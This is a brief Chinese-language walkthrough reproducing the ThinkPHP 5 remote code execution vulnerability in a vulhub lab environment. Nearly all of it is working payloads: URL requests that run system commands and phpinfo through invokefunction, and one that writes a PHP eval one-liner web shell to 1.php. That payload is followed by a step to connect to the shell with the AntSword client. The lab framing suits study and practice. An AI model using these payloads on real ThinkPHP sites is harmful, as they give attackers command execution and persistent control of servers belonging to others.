环境配置
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境
漏洞复现
1.访问靶场:http://172.16.1.198:8080/

2.远程命令执⾏
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=whoami

3.远程代码执行
POC:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

4.写入一句话木马到根目录下的1.php
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > 1.php

5.蚁剑连接
